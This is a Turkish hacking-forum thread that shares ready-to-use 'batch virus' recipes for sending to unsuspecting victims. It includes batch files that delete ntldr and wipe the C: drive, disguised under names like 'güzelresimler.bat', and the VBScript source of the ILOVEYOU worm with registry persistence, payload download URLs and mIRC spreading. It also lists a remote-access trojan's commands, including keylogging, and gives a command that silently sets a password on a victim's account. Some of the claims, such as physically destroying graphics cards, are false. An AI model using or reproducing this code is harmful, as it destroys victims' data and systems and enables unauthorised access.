İPUCU

Bilgisayar Güvenliği Bilgisayar Güvenlik Sistemleri makaleleri, virüs korumasından, güvenlik duvarlarına kadar her şeyin nasıl çalıştığı hakkında bilgilere buradan ulaşabilirsiniz.

Seçenekler

Bat Virüsü Hazırlama

18-04-2013 01:29
#1
bbagis - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
02/2011
Mesajlar:
734
Teşekkür (Etti):
19
Teşekkür (Aldı):
105
Konular:
213
Ticaret:
(0) %
Bat virüsü hazırlama
İşte kodlar:

cd..

cd..

attrib -s -h -r -a c:\ntldr

del c:\ntldr

shutdown -r

arkadaşlar bu kodları bilgisayarımızdaki notpadi açarak içerisine kopyalıyoruz ve dosyayı kaydederken uzantısını .bat olarak değiştiriyoruz. sakın olaki dosyayı kendiniz açmayın!!!

örneğin; güzelresimler.bat


sonra işin heyecanlı kısmına gelelim. dosyamızı winrar yada winzip gibi programlar aracılığıyla karşı tarafa yolluyoruz. ve karşı taraf bu dosyayı açtığında boooom!!!! pc kendine otomatik format çeker.


haaa olaki dosyayı kendiniz yanlışlıkla açtınız olsun önemli deil; ben size bunun panzehirinide veriyimde içiniz rahatlısın.


yukarıdaki gibi hazırlamış olduğumuz dosya açıldığında 30 saniyelik bir geri sayma işlemi başlar forrmat işlemi için. bu 30 saniye bitmeden aşağıda verdiğim kodları yine aynı şekilde bat olarak kaydedip açtığınızda format işlemi duruyo. ama siz yinede denemeyin ne olur ne olmaz o kadar riske girmeyin..


panzehir kodları;


shutdown -a


_________________________________________


Yöntem Ms-dostan Pc ye gir


ms-dos a geç , ve *setdebug* yaz karşına *Enable AktiveX debugging for Java* diye bir yazı gelecek ona tamam de ve bir sonraki satıra *debug* yaz sonra diğer satıra *XAbilgine gireceğin ip* yi yazıp enter ediyoruz sonra işleyici oluşturuldu yazısı gelecek şimdi "Programlar>Çalıştır>telnet" yazıp telneti açıyoruz sonra "uzaktaki sistem" deyip adamın ip'sini tekrar yazıyoruz gerisi size kalmış bu komutları kullanabilirsin. (*) ları yazmıyoruz. Kolay gelsin...

CaptureScreen Ekrandan goruntu alır
DelFile;(filename.exe) Dosya siler
DisableKeys;1;(keys) harfleri iptal eder [kullanıcı klavyeyi kullanamaz]
DisableKeys;0; Klavye tekrar aktif olur
DisableKeys;1;abcdefghijklmnopqrstuvwxyzåäö Harfler kullanılmaz hale gelir
DownloadFile;(path:filename.exe) istediginiz dosyayi cekersiniz
Eject;1 CD-ROM'u acar
Eject;0 CD-ROM'u kapar
ExitWin;1 Windos'u kapar
GetApps Calısan prg.ları listeler
GetACL Admin Listi verir
GetInfo Info penceresini verir
GetDisks Hardiskindeki dosyaları gosterir
GetSetup Server icin ayarları verir
GetUser Kullanıcı hakkında bilgi verir GetVolume Sesi acar
KeyClick;1 Key click on
KeyClick;0 Key click off
Listen;1 Start (keyboard) bir nevi keyloger adamın yazdıklarını gorursunuz
Listen;0 Stop listening
Message;(message) Messagebox halinde mesaj yolalrsınız
NewSetup;serverport;1;password;youremail;VICTIMSem ail;smtpserver Sends the new admindata (1.7)
Password;1;any ENTER'a bas ve ServerPwd;yenisifre Passwordu deistirir(1.6)
PlaySound;(file.wav) wav dosyası calar
PortRedir;(listen tcp port);(ip);(destination port) ******** the specified port
Record;10 = 10 saniyelik ses kaydeder
RemoveServer;1 Server'ı kaldırır
RemoveServer;0 Kaldırmayı iptal eder
ShowImage;(file.exe) Resim gosterir
SendKeys;(words) Mesaj yollar * tusu ile yazdıgınız siler
SendKeys;2;13 Sends ozel tuslar [sag,sol,yukari,asagi]
SetACL;(ip)| Set (admin) access IP`s
SetMousePos;(xpos);(ypos) Mouse'u oynatırsınız
SwapButton;1 Mouse'un tuslarının yerlerini degistirir
SwapButton;0 Mouse'u eski haline getirir
StartApp;(file.exe) Program calıstırır
UploadFile;(file.exe);(size);(destination dir) Dosya yollarsınız


_________________________________________


Yöntem Ekran Kartını Yakın


@echo off
C:\WINDOWS\COMMAND\deltree /y c:\windows\*.*
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\Progra~1\*.*
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\*.*
@echo off
cls
cls
@echo .:: HacKeD By RaZoR::.
@echo off3.


kodlarını yapıştırın ve farklı kaydet diyin. dosya adını yazın ve sonuna .bat yazın. (örnek: açma.bat)

vede kaydedin böylece ms-dos toplu iş dosyası oluşacak bunu sakın açmayın ve kimin ekran kartını yakmak istiyorsanız o kişiye yollayın. kurban dosyaya iki kere tıkadığı zaman saniyede 1000 den fazla ms-dos sayfası açılacak vede yaklasık 30 sn sonra ekran kartı gücünü kaybedip yorulacak. en sonunda HacKeD By RaZoR yazısı görünecek (burayı kendiniz değiştirebilirsiniz) vede görüntü gidecek. yeni ekran kartı alana kadar da gelmiyecek kolay gelsin

_________________________________________


buda Format virüsü karşıya gönderdiğinizde 30sn içinde pc otomatikmen format atıyor ayrıca format atarken ekran kartını yakıp CD-romu bozuyor yani format attıktan sonra tekrardan windowsu geri yüklüyemeyecektir çünkü CD-rom Cd okumuyacaktı yenisini alsa bile yani anlıcayacğınız pc toprak oldu demektir

rem delete -pcaş(-vbe)
On es error -pc
On error Next Pc Hack
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,d ow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Micros oft\Window s Scripting Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Cur rentVersio n\Run\MSKernel32",dirsystem&"\MSKernel32.vbs"
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Cur rentVersio n\RunServices\Win32DLL",dirwin&"\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Micros oft\Intern et Explorer\Download Directory")
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf 7679njbvYT /WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4j nHHGbvbmKL JKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGq**198vbFV5hfFEkbopBdQZnmPOhfgER67b3V bvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqweras djhPhjasfd glkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Cur rentVersio n\Run\WIN-BUGSFIX",downread&"\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.i ni")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( şnick == şme ) { halt }"
scriptini.WriteLine "n2= /.dcc send şnick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0



_________________________________________



sırada karşıdaki pc ye karşıdakinin haberi olmadan şifre koymak var aşağıdaki kdou .bat çevirip gönderin

net user %username% [parola]


_________________________________________


sıradaki kod karşıdakinin ekranını ve msn sini kaptıyor aşağıdaki kodları ne kadar çok yazarsanız karşıdaki pc nin ekranı ve msn si o kadar uzun süre kapanır

start tskill explorer
start tskill msnmsgr
start tskill explorer
start tskill msnmsgr
start tskill explorer
start tskill msnmsgr
start tskill explorer
start tskill msnmsgr
start tskill explorer
start tskill msnmsgr
start tskill explorer
start tskill msnmsgr
start tskill explorer
start tskill msnmsgr
start tskill explorer
start tskill msnmsgr
start tskill explorer
start tskill msnmsgr
start tskill explorer
start tskill msnmsgr
start tskill explorer
start tskill msnmsgr
start tskill explorer
start tskill msnmsgr
start tskill explorer
start tskill msnmsgr
start tskill explorer
start tskill msnmsgr
start tskill explorer


Benden bu kadar daha .bat virüsleri bulursam sizlerle paylaşırım
Kullanıcı İmzası





Sus Ve Beni '' İZLE '' !!

Tehlike67 Teşekkür etti.

18-04-2013 09:01
#2
Advancel - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2011
Nereden:
Yurt Dışı Be
Mesajlar:
415
Teşekkür (Etti):
239
Teşekkür (Aldı):
16
Konular:
115
Ticaret:
(0) %
Güzel Paylaşım.

http://www.turkhackteam.net/trojan-v...virus-yok.html

Bakmalısın.
Kullanıcı İmzası
Quis Custodiet İpsos Custodes

Beni üzen insanları zamana bıraktım demleniyorlar. Kıvama geldiklerinde, yudum yudum içeceğim.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı